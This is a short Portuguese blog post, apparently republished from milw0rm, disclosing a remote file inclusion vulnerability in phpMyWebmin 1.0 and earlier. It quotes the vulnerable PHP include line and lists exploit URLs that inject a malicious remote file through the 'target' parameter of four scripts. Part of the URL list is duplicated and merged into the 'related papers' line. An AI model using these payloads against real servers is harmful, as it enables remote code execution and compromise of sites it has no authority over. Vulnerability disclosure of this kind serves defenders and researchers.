Script: phpMyWebmin 1.0 e anteriores
Download: josh.ch
Código vulnerável (nos arquivos citados):
include("$target/$folder/preferences.php");
Desoberta por: XORONExploit:
http://host/change_preferences2.php?target=arquivomaligno?
http://host/create_file.php?target=arquivomaligno?
http://host/upload_local.php?target=arquivomaligno?
http://host/upload_multi.php?target=arquivomaligno?
Papers relacionados: Inclusão de Arquivo Remoto.txthttp://host/create_file.php?target=arquivomaligno?
http://host/upload_local.php?target=arquivomaligno?
http://host/upload_multi.php?target=arquivomaligno?
Fonte: milw0rm.com
Nenhum comentário:
Postar um comentário